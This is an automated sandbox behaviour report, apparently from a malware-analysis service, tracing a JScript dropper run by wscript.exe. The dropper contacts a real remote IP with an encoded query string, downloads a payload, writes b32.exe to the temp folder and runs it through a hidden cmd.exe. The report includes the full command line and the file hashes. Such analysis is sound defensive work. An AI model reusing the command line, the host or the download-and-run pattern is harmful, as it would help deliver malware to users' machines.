Command Line wscript //B //E:JScript u32.tmp "LZytas3d" "http://95.142.39.142/?MTAzNDE3&ofvcTlM&NOhFPrkEXYygcYr=c2Vh&XFZaDrsXTiVcOS=c2Vh&CQXjFXpCD=bWF0Y2h1cA==&uZwiNDOCVY=c3BvcnQ=&DGPafWFTVR=c2My&fdfsdf3gf=xXzQMvWebRXQCJ3EKvncT6NEMVHRHkCL2YqdmrHVefjaelWkzrfFTF_yozKATgSG6_dtdfJR&t4dsdfa4=DQbiiUHRfwQ1n49cBwsS9K6n20XUnUefh8SH-UCEYA5M-pOUFLcz2VX9yLMkc8Mm90vC62Jg&KMWDJCCKgTcdNl=cmVzb3J0&wAORzkZnO=cmVzb3J0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)"
Initial Working Directory C:\Users\5P5NRG~1\AppData\Local\Temp\
Monitor Start Time: 00:00:35, Reason: Child Process
Unmonitor End Time: 00:02:24, Reason: Terminated by Timeout
Monitor Duration 00:01:49
OS Process Information
»
Information Value
PID 0xa84
Parent PID 0xa6c (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x A88
0x A90
0x A94
0x A98
0x A9C
0x AA0
0x AA4
0x AA8
0x AB0
0x AB4
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x00026fff Pagefile Backed Memory Readable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00031fff Pagefile Backed Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
private_0x0000000000060000 0x00060000 0x00060fff Private Memory Readable, Writable True False False -
private_0x0000000000070000 0x00070000 0x00070fff Private Memory Readable, Writable True False False -
wscript.exe 0x00080000 0x0008efff Memory Mapped File Readable True False False -
private_0x0000000000090000 0x00090000 0x000cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000000d0000 0x000d0000 0x000d0fff Pagefile Backed Memory Readable True False False -
wscript.exe 0x000e0000 0x00105fff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x0000000000110000 0x00110000 0x00110fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000120000 0x00120000 0x00120fff Pagefile Backed Memory Readable True False False -
private_0x0000000000120000 0x00120000 0x0012ffff Private Memory Readable, Writable True False False -
private_0x0000000000130000 0x00130000 0x0016ffff Private Memory Readable, Writable True False False -
private_0x0000000000170000 0x00170000 0x001effff Private Memory Readable, Writable True False False -
locale.nls 0x001f0000 0x00256fff Memory Mapped File Readable False False False -
rsaenh.dll 0x00260000 0x0029bfff Memory Mapped File Readable False False False -
pagefile_0x0000000000260000 0x00260000 0x00260fff Pagefile Backed Memory Readable True False False -
scrrun.dll 0x00260000 0x00274fff Memory Mapped File Readable False False False -
tzres.dll 0x00280000 0x00280fff Memory Mapped File Readable False False False -
private_0x0000000000280000 0x00280000 0x00280fff Private Memory Readable, Writable True False False -
c_28591.nls 0x00280000 0x00290fff Memory Mapped File Readable False False False -
wshom.ocx 0x002a0000 0x002abfff Memory Mapped File Readable True False False -
private_0x00000000002b0000 0x002b0000 0x003affff Private Memory Readable, Writable True False False -
private_0x00000000003b0000 0x003b0000 0x003effff Private Memory Readable, Writable True False False -
pagefile_0x00000000003f0000 0x003f0000 0x003f0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000410000 0x00410000 0x0050ffff Private Memory Readable, Writable True False False -
private_0x0000000000510000 0x00510000 0x0063ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000510000 0x00510000 0x005eefff Pagefile Backed Memory Readable True False False -
private_0x0000000000600000 0x00600000 0x0063ffff Private Memory Readable, Writable True False False -
private_0x0000000000680000 0x00680000 0x0068ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000690000 0x00690000 0x00817fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000820000 0x00820000 0x009a0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000009b0000 0x009b0000 0x01daffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001db0000 0x01db0000 0x020f2fff Pagefile Backed Memory Readable True False False -
private_0x0000000002100000 0x02100000 0x0216ffff Private Memory Readable, Writable True False False -
private_0x0000000002190000 0x02190000 0x021cffff Private Memory Readable, Writable True False False -
private_0x00000000021d0000 0x021d0000 0x0224ffff Private Memory Readable, Writable True False False -
private_0x0000000002250000 0x02250000 0x0228ffff Private Memory Readable, Writable True False False -
private_0x0000000002290000 0x02290000 0x0238ffff Private Memory Readable, Writable True False False -
private_0x0000000002390000 0x02390000 0x023cffff Private Memory Readable, Writable True False False -
private_0x0000000002410000 0x02410000 0x0250ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x02510000 0x027defff Memory Mapped File Readable False False False -
private_0x00000000027f0000 0x027f0000 0x0282ffff Private Memory Readable, Writable True False False -
private_0x0000000002850000 0x02850000 0x0294ffff Private Memory Readable, Writable True False False -
private_0x00000000029a0000 0x029a0000 0x029dffff Private Memory Readable, Writable True False False -
private_0x0000000002a00000 0x02a00000 0x02afffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002b00000 0x02b00000 0x02efffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000002f00000 0x02f00000 0x02ffffff Private Memory Readable, Writable True False False -
kernelbase.dll.mui 0x02f00000 0x02fbffff Memory Mapped File Readable, Writable False False False -
private_0x0000000002ff0000 0x02ff0000 0x02ffffff Private Memory Readable, Writable True False False -
private_0x0000000003000000 0x03000000 0x030fffff Private Memory Readable, Writable True False False -
private_0x0000000003100000 0x03100000 0x0319efff Private Memory Readable, Writable True False False -
private_0x0000000003180000 0x03180000 0x031bffff Private Memory Readable, Writable True False False -
private_0x00000000031c0000 0x031c0000 0x032bffff Private Memory Readable, Writable True False False -
private_0x00000000032c0000 0x032c0000 0x0335efff Private Memory Readable, Writable True False False -
private_0x0000000003380000 0x03380000 0x0347ffff Private Memory Readable, Writable True False False -
private_0x0000000003480000 0x03480000 0x0361ffff Private Memory Readable, Writable True False False -
private_0x0000000003480000 0x03480000 0x0357ffff Private Memory Readable, Writable True False False -
private_0x00000000035e0000 0x035e0000 0x0361ffff Private Memory Readable, Writable True False False -
private_0x0000000003620000 0x03620000 0x0371ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000003720000 0x03720000 0x03b12fff Pagefile Backed Memory Readable True False False -
private_0x0000000003b20000 0x03b20000 0x03ceffff Private Memory Readable, Writable True False False -
private_0x0000000003bf0000 0x03bf0000 0x03c8efff Private Memory Readable, Writable True False False -
private_0x0000000003cb0000 0x03cb0000 0x03ceffff Private Memory Readable, Writable True False False -
private_0x0000000003cf0000 0x03cf0000 0x03eaffff Private Memory Readable, Writable True False False -
private_0x0000000003cf0000 0x03cf0000 0x03deffff Private Memory Readable, Writable True False False -
private_0x0000000003e70000 0x03e70000 0x03eaffff Private Memory Readable, Writable True False False -
private_0x0000000003eb0000 0x03eb0000 0x040affff Private Memory Readable, Writable True False False -
private_0x00000000040b0000 0x040b0000 0x042affff Private Memory Readable, Writable True False False -
private_0x00000000042b0000 0x042b0000 0x046affff Private Memory Readable, Writable True False False -
private_0x00000000046b0000 0x046b0000 0x04eaffff Private Memory Readable, Writable True False False -
private_0x0000000004eb0000 0x04eb0000 0x052affff Private Memory Readable, Writable True False False -
private_0x0000000005540000 0x05540000 0x05d3ffff Private Memory Readable, Writable True False False -
private_0x0000000005d40000 0x05d40000 0x06d0ffff Private Memory Readable, Writable True False False -
private_0x0000000006d30000 0x06d30000 0x06e2ffff Private Memory Readable, Writable True False False -
webio.dll 0x70fa0000 0x70feefff Memory Mapped File Readable, Writable, Executable False False False -
winhttp.dll 0x70ff0000 0x71047fff Memory Mapped File Readable, Writable, Executable False False False -
mpr.dll 0x71050000 0x71061fff Memory Mapped File Readable, Writable, Executable False False False -
wshom.ocx 0x71070000 0x71090fff Memory Mapped File Readable, Writable, Executable True False False -
msdart.dll 0x710a0000 0x710befff Memory Mapped File Readable, Writable, Executable False False False -
msado15.dll 0x710c0000 0x711b8fff Memory Mapped File Readable, Writable, Executable False False False -
scrrun.dll 0x71260000 0x71289fff Memory Mapped File Readable, Writable, Executable False False False -
credssp.dll 0x72f20000 0x72f27fff Memory Mapped File Readable, Writable, Executable False False False -
sxs.dll 0x73000000 0x7305efff Memory Mapped File Readable, Writable, Executable False False False -
pwrshsip.dll 0x74380000 0x74388fff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x74390000 0x74413fff Memory Mapped File Readable, Writable, Executable False False False -
mlang.dll 0x74790000 0x747bdfff Memory Mapped File Readable, Writable, Executable False False False -
wshtcpip.dll 0x74e00000 0x74e04fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x74e20000 0x74e5bfff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x74f60000 0x74f6dfff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x74f70000 0x74faafff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74fb0000 0x74fc5fff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x75000000 0x75008fff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x75070000 0x750b3fff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x752b0000 0x752c2fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x752d0000 0x7534ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x75360000 0x75367fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x75370000 0x753cbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x753d0000 0x7540efff Memory Mapped File Readable, Writable, Executable False False False -
wshext.dll 0x75410000 0x75425fff Memory Mapped File Readable, Writable, Executable True False False -
msisip.dll 0x75430000 0x75437fff Memory Mapped File Readable, Writable, Executable False False False -
jscript.dll 0x75530000 0x755e1fff Memory Mapped File Readable, Writable, Executable True False False -
cryptbase.dll 0x75980000 0x7598bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75990000 0x759effff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75a30000 0x75a48fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x75a50000 0x75a55fff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x75a60000 0x75b7cfff Memory Mapped File Readable, Writable, Executable False False False -
wintrust.dll 0x75b80000 0x75bacfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75bb0000 0x75bf5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fd0000 0x760dffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x760e0000 0x7617ffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x76180000 0x761d6fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x76380000 0x763b4fff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x763c0000 0x763c9fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x763d0000 0x763dbfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x763e0000 0x764dffff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x764e0000 0x7656efff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x76670000 0x7671bfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x76720000 0x767ebfff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76890000 0x76912fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76920000 0x77569fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x77570000 0x775cffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x775d0000 0x776bffff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x776c0000 0x7781bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x77820000 0x778affff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x77990000 0x77a2cfff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000077a30000 0x77a30000 0x77b4efff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077b50000 0x77b50000 0x77c49fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77c50000 0x77df8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77e30000 0x77faffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efa1000 0x7efa1000 0x7efa3fff Private Memory Readable, Writable True False False -
private_0x000000007efa4000 0x7efa4000 0x7efa6fff Private Memory Readable, Writable True False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 31 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\5p5nrg~1\appdata\local\temp\b32.exe 316.01 KB MD5: 2a5926e061c5cf3c6f8bb8908464468a
SHA1: d256701b40efd72f2ed9c0ebacdea162926590cd
SHA256: c0db3c329592294a81f23c37e701a189110913c17d1371bc625a3eae97f37a94
False
Threads
Thread 0xa88
336 6
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-05-11 13:20:37 (UTC) True 1
Fn
System Get Time type = Ticks, time = 100027 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\wscript.exe, base_address = 0xe0000 True 2
Fn
System Get Info type = Operating System True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 0, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 3, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 3, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 3, type = REG_NONE False 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSetInformation, address_out = 0x75fe5651 True 1
Fn
Module Get Filename module_name = c:\windows\syswow64\wscript.exe, process_name = c:\windows\syswow64\wscript.exe, file_name_orig = C:\Windows\SysWOW64\wscript.exe, size = 261 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 205, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 96, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 205, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 96, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 1, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 160, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 1, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 160, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 49, type = REG_NONE False 1
Fn
System Sleep duration = -1 (infinite) True 1
Fn
COM Create interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegisterTraceGuidsA, address_out = 0x77e9848f True 2
Fn
Module Get Filename process_name = c:\windows\syswow64\wscript.exe, file_name_orig = C:\Windows\SysWOW64\wscript.exe, size = 260 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExA, address_out = 0x760f4907 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features False 1
Fn
System Get Info type = Operating System True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExA, address_out = 0x760f48ef True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\COM3, value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x760f469d True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ole32.dll, base_address = 0x776c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoGetObjectContext, address_out = 0x7770632b True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x776c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x77709d0b True 1
Fn
COM Create interface = 00000146-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Environment Get Environment String name = JS_PROFILER False 1
Fn
COM Create interface = 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Time type = Ticks, time = 100074 True 2
Fn
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\u32.tmp, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\u32.tmp, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\5P5NRG~1\AppData\Local\Temp\u32.tmp, filename = C:\Users\5P5NRG~1\AppData\Local\Temp\u32.tmp, protection = PAGE_READONLY, maximum_size = 1141 True 1
Fn
Module Map C:\Users\5P5NRG~1\AppData\Local\Temp\u32.tmp, process_name = c:\windows\syswow64\wscript.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\wscript.exe True 1
Fn
System Get Info type = System Directory True 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Module Load module_name = C:\Windows\system32\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SaferIdentifyLevel, address_out = 0x76102102 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SaferComputeTokenFromLevel, address_out = 0x76103352 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SaferCloseLevel, address_out = 0x76103825 True 1
Fn
System Get Info type = Operating System True 1
Fn
COM Get Class ID cls_id = 0D43FE01-F093-11CF-8940-00A0C9054228, prog_id = Scripting.FileSystemObject True 1
Fn
COM Create interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
COM Get Class ID cls_id = 00000566-0000-0010-8000-00AA006D2EA4, prog_id = ADODB.Stream True 1
Fn
COM Create interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
COM Get Class ID cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell True 1
Fn
COM Create interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Filename process_name = c:\windows\syswow64\wscript.exe, file_name_orig = C:\Windows\SysWOW64\wscript.exe, size = 261 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\wscript.exe, base_address = 0xe0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wscript.exe, function = 1, address_out = 0xe2bb9 True 1
Fn
COM Get Class ID cls_id = 2087C2F4-2CEF-4953-A8AB-66779B670495, prog_id = WinHTTP.WinHTTPRequest.5.1 True 1
Fn
COM Create interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1
Fn
Inet Open Connection protocol = http, server_name = 95.142.39.142, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = / True 1
Fn
Inet Send HTTP Request url = http://95.142.39.142/?MTAzNDE3&ofvcTlM&NOhFPrkEXYygcYr=c2Vh&XFZaDrsXTiVcOS=c2Vh&CQXjFXpCD=bWF0Y2h1cA==&uZwiNDOCVY=c3BvcnQ=&DGPafWFTVR=c2My&fdfsdf3gf=xXzQMvWebRXQCJ3EKvncT6NEMVHRHkCL2YqdmrHVefjaelWkzrfFTF_yozKATgSG6_dtdfJR&t4dsdfa4=DQbiiUHRfwQ1n49cBwsS9K6n20XUnUefh8SH-UCEYA5M-pOUFLcz2VX9yLMkc8Mm90vC62Jg&KMWDJCCKgTcdNl=cmVzb3J0&wAORzkZnO=cmVzb3J0 True 1
Fn
Inet Receive HTTP Status status = 200 True 1
Fn
Inet Read Response size_out = 288, data = %&Ó"ÉÚPtBw®îþÃä#1û÷j¶„Ë"¦â¬Â›Ú«>#Wá¤(Jö›(½ O÷ ê¤R±íÎÖ¶?è-ž#z*AɚÊHÙ蚸ù#¥Áuz̕Ûíéß$$!ëÔög“eŠÑêjke ¥\Ô®èã]v*ÂtÎúÃþ×±·ë†»—ñÂæ>oåñüق´ÍS†j!ʅâÃôÜó^vÑ£oŽRdÁ\$ßä‡è o§]F¥èV ¾Ë•ÎBÜjÙtQQf!…Þ¼ý9£|dšüÏ>ú:Ù3ŽæÃpÈɂ/o8cêõ?ªqçã ø-sëP’ååq_¥3cwÂY´FÀό_¹S4`¸ª÷AãÔE¯µ¥jUl True 1
Fn
System Get Time type = Ticks, time = 102617 True 1
Fn
System Get Time type = Ticks, time = 102648 True 3
Fn
System Get Time type = Ticks, time = 102664 True 9
Fn
System Get Time type = Ticks, time = 102679 True 11
Fn
System Get Time type = Ticks, time = 102695 True 10
Fn
System Get Time type = Ticks, time = 102726 True 11
Fn
System Get Time type = Ticks, time = 102742 True 14
Fn
System Get Time type = Ticks, time = 102757 True 13
Fn
System Get Time type = Ticks, time = 102820 True 11
Fn
System Get Time type = Ticks, time = 102835 True 13
Fn
System Get Time type = Ticks, time = 102851 True 12
Fn
System Get Time type = Ticks, time = 102913 True 12
Fn
System Get Time type = Ticks, time = 102929 True 10
Fn
System Get Time type = Ticks, time = 102945 True 9
Fn
System Get Time type = Ticks, time = 102976 True 3
Fn
System Get Time type = Ticks, time = 102991 True 10
Fn
System Get Time type = Ticks, time = 103007 True 8
Fn
System Get Time type = Ticks, time = 103023 True 2
Fn
System Get Time type = Ticks, time = 103038 True 9
Fn
System Get Time type = Ticks, time = 103054 True 10
Fn
System Get Time type = Ticks, time = 103069 True 7
Fn
System Get Time type = Ticks, time = 103085 True 9
Fn
System Get Time type = Ticks, time = 103101 True 9
Fn
System Get Time type = Ticks, time = 103116 True 7
Fn
System Get Time type = Ticks, time = 103132 True 6
Fn
System Get Time type = Ticks, time = 103147 True 4
Fn
System Get Time type = Ticks, time = 103179 True 5
Fn
System Get Time type = Ticks, time = 103194 True 2
Fn
System Get Time type = Ticks, time = 103210 True 4
Fn
System Get Time type = Ticks, time = 103225 True 4
Fn
System Get Time type = Ticks, time = 103257 True 4
Fn
System Get Time type = Ticks, time = 103272 True 6
Fn
System Get Time type = Ticks, time = 103288 True 1
Fn
System Get Time type = Ticks, time = 103865 True 1
Fn
File Create filename = b32.exe True 1
Fn
File Write filename = b32.exe True 1
Fn
Module Load module_name = shell32.dll, base_address = 0x76920000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x76941e46 True 1
Fn
Process Create process_name = cmd.exe, show_window = SW_HIDE True 1
Fn
System Sleep duration = -1 (infinite) True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = UnregisterTraceGuids, address_out = 0x77e89286 True 2
Fn
Thread 0xa94
2 0
»
Category Operation Information Success Count Logfile
Window Create class_name = WSH-Timer, wndproc_parameter = 6820864 True 1
Fn
Window Set Attribute class_name = WSH-Timer, index = 18446744073709551595, new_long = 6820864 False 1
Fn
Process #5: cmd.exe
56 0
»
Information Value
ID #5
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\System32\cmd.exe" /c b32.exe
Initial Working Directory C:\Users\5P5NRG~1\AppData\Local\Temp\
Monitor Start Time: 00:00:41, Reason: Child Process
Unmonitor End Time: 00:02:24, Reason: Terminated by Timeout
Monitor Duration 00:01:43
OS Process Information
»
Information Value
PID 0xab8
Parent PID 0xa84 (c:\windows\syswow64\wscript.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x ABC
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
